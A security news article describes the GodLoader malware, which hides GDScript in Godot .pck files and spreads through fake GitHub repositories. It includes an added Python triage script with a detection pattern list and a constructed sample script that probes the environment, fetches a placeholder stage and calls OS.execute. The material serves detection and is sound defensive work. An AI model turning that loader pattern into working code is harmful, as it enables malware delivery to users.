Threat actors have recently devised a clever new method for deploying malware across various operating systems and platforms. This new malware loader, known as GodLoader, leverages the popular open-source game engine Godot Engine to deliver malicious code to unsuspecting victims. The deployment of GodLoader is facilitated through the Stargazers Ghost Network, a network of GitHub accounts and repositories that provide malware distribution as a service.
According to researchers at Check Point, over 17,000 machines have already fallen victim to GodLoader. Developers, in particular, are at heightened risk due to their frequent use of open-source platforms like Godot Engine for game development. The potential for inadvertently incorporating malicious code into their projects poses a significant concern. Additionally, gamers downloading and installing games created with compromised tools may unknowingly expose themselves to security risks.
One of the key aspects of GodLoader is its use of the Godot Engine's own capabilities. The threat actors behind this scheme exploited the engine's .pck files, which bundle game assets and scripts for distribution. By embedding malicious GDScript within these files, the attackers can carry out their activities while evading detection: GDScript is expressive enough to implement anti-sandbox checks and to fetch and execute remote payloads, which lets the malware operate covertly.
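As an added example (not code from the Check Point report or the Godot project), the following Python script shows the defender-side check this paragraph suggests: parse a Godot .pck container, list the GDScript files bundled in it, and flag scripts that use the APIs a loader of this kind needs (process execution, network fetches, environment probing, payload decoding). The container layout it parses is my reading of Godot's pack format 1 (3.x) and format 2 (4.x) and should be verified against the engine version in use; the API list and the sample scripts are constructed for illustration and are not indicators from the report.

```python
"""Triage a Godot .pck archive: list bundled GDScript and flag risky API use.

Added example, not Check Point's or Godot's code. Container layout is my
reading of Godot's pack format 1 (3.x) and 2 (4.x); verify against the
engine version you target. The API list is illustrative, not exhaustive.
"""
import hashlib
import re
import struct

PCK_MAGIC = 0x43504447        # "GDPC" read as a little-endian uint32
PACK_DIR_ENCRYPTED = 1        # format 2 pack flag: file directory is encrypted
PACK_FILE_ENCRYPTED = 1       # format 2 per-file flag: contents are encrypted

# Real Godot API names that benign game scripts rarely combine; a hit is a
# lead for an analyst, not a verdict.
RISKY_PATTERNS = {
    "process execution": re.compile(r"\bOS\.(execute|create_process)\b"),
    "network fetch": re.compile(r"\bHTTP(Request|Client)\b"),
    "environment probing": re.compile(r"\bOS\.get_environment\b"),
    "payload decoding": re.compile(r"\bMarshalls\.base64_to_raw\b"),
}


def parse_pck(data: bytes) -> dict:
    """Parse the PCK header and file directory without touching file bodies."""
    magic, version = struct.unpack_from("<2I", data, 0)
    if magic != PCK_MAGIC:
        raise ValueError("not a Godot PCK: bad magic")
    pos, file_base, dir_encrypted = 20, 0, False  # 20 = magic, version, engine major/minor/patch
    if version == 2:
        pack_flags, file_base = struct.unpack_from("<IQ", data, pos)
        pos += 12
        dir_encrypted = bool(pack_flags & PACK_DIR_ENCRYPTED)
    elif version != 1:
        raise ValueError(f"unsupported pack format {version}")
    pos += 16 * 4  # reserved words
    (count,) = struct.unpack_from("<I", data, pos)
    pos += 4
    files = []
    if not dir_encrypted:  # an encrypted directory needs the export key to read
        for _ in range(count):
            (plen,) = struct.unpack_from("<I", data, pos)
            pos += 4
            path = data[pos:pos + plen].rstrip(b"\0").decode("utf-8")  # null-padded to 4 bytes
            pos += plen
            offset, size = struct.unpack_from("<QQ", data, pos)
            pos += 16 + 16  # offset, size, then the 16-byte MD5 of the contents
            flags = 0
            if version == 2:
                (flags,) = struct.unpack_from("<I", data, pos)
                pos += 4
            files.append({"path": path, "offset": file_base + offset, "size": size,
                          "encrypted": bool(flags & PACK_FILE_ENCRYPTED)})
    return {"version": version, "dir_encrypted": dir_encrypted, "files": files}


def scan_pck(data: bytes) -> list:
    """Return one finding per risky line, plus one per script that cannot be read as text."""
    info = parse_pck(data)
    if info["dir_encrypted"]:
        return [{"path": "<directory>", "category": "encrypted directory", "line": 0}]
    findings = []
    for entry in info["files"]:
        path = entry["path"]
        if not path.endswith((".gd", ".gdc", ".gde")):
            continue
        if entry["encrypted"] or path.endswith(".gde"):
            findings.append({"path": path, "category": "encrypted script", "line": 0})
        elif path.endswith(".gdc"):
            findings.append({"path": path, "category": "tokenized script (needs decompiling)", "line": 0})
        else:
            text = data[entry["offset"]:entry["offset"] + entry["size"]].decode("utf-8", "replace")
            for lineno, line in enumerate(text.splitlines(), 1):
                for category, pattern in RISKY_PATTERNS.items():
                    if pattern.search(line):
                        findings.append({"path": path, "category": category, "line": lineno})
    return findings


def build_pck(version: int, entries: dict) -> bytes:
    """Assemble a minimal PCK from {path: bytes}; used here only to construct test input."""
    header = struct.pack("<5I", PCK_MAGIC, version, 3 if version == 1 else 4, 0, 0)
    if version == 2:
        header += struct.pack("<IQ", 0, 0)  # pack_flags, file_base (offsets kept absolute)
    header += b"\0" * 64 + struct.pack("<I", len(entries))
    paths = [p.encode() + b"\0" * (-len(p.encode()) % 4) for p in entries]
    offset = len(header) + sum(len(p) + (40 if version == 2 else 36) for p in paths)
    directory, body = b"", b""
    for p, content in zip(paths, entries.values()):
        directory += struct.pack("<I", len(p)) + p
        directory += struct.pack("<QQ", offset, len(content)) + hashlib.md5(content).digest()
        if version == 2:
            directory += struct.pack("<I", 0)
        body += content
        offset += len(content)
    return header + directory + body


# Constructed sample scripts (not real malware): one benign, one combining the
# APIs a loader needs to probe its host, fetch a stage and run it.
BENIGN_GD = b"extends KinematicBody2D\n\nfunc _physics_process(delta):\n\tmove_and_slide(Vector2.ZERO)\n"
SUSPECT_GD = b"""extends Node

func _ready():
\tvar user = OS.get_environment("USERNAME")
\tvar req = HTTPRequest.new()
\tadd_child(req)
\treq.request("https://example.invalid/stage2")  # constructed placeholder URL
\tvar blob = Marshalls.base64_to_raw("QUJD")
\tOS.execute("placeholder", [])
"""
SAMPLE_PCK = build_pck(1, {"res://scripts/player.gd": BENIGN_GD,
                           "res://addons/loader.gd": SUSPECT_GD,
                           "res://icon.png": b"\x89PNG constructed"})

if __name__ == "__main__":
    for f in scan_pck(SAMPLE_PCK):
        print(f"{f['path']}:{f['line']}: {f['category']}")
```

Run against a real export, the script only reads the directory and the plaintext .gd entries, so it is safe to point at an untrusted archive; encrypted or tokenized scripts are reported rather than executed, which is the point at which an analyst would move to a sandbox or a GDScript decompiler.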
The researchers discovered that the threat actors initially targeted Windows machines but also developed proof-of-concept loaders for macOS and Linux. While an Android loader is theoretically feasible with modifications to the Godot Engine, an iOS version is less likely due to Apple’s stringent App Store policies. The distribution of GodLoader through the Stargazers Ghost Network capitalizes on users’ familiarity with browsing GitHub for software packages and cheats.
The distribution strategy employed by the threat actors involved approximately 200 repositories and over 225 Stargazer Ghost accounts. Victims were lured into downloading what they believed to be cracked versions of paid software or key generators, only to unwittingly install GodLoader. Once executed, GodLoader proceeded to install either the XMRig cryptocurrency miner or the RedLine infostealer. GodLoader has evaded detection by antivirus tools since at least June 29, 2024.
The combination of targeted distribution tactics and stealthy deployment techniques has led to a high infection rate. Check Point researchers warned that almost all antivirus engines in VirusTotal have failed to detect the presence of GodLoader. This underscores the need for heightened awareness and vigilance among users, especially developers and gamers who may be susceptible to such attacks.
In conclusion, the emergence of GodLoader as a malware delivery mechanism highlights the evolving tactics employed by threat actors to infiltrate systems and compromise user data. The utilization of legitimate software platforms like Godot Engine for malicious purposes underscores the importance of robust security measures and regular software updates to mitigate the risk of malware infections. Vigilance and caution are paramount in safeguarding against emerging cyber threats in the digital landscape.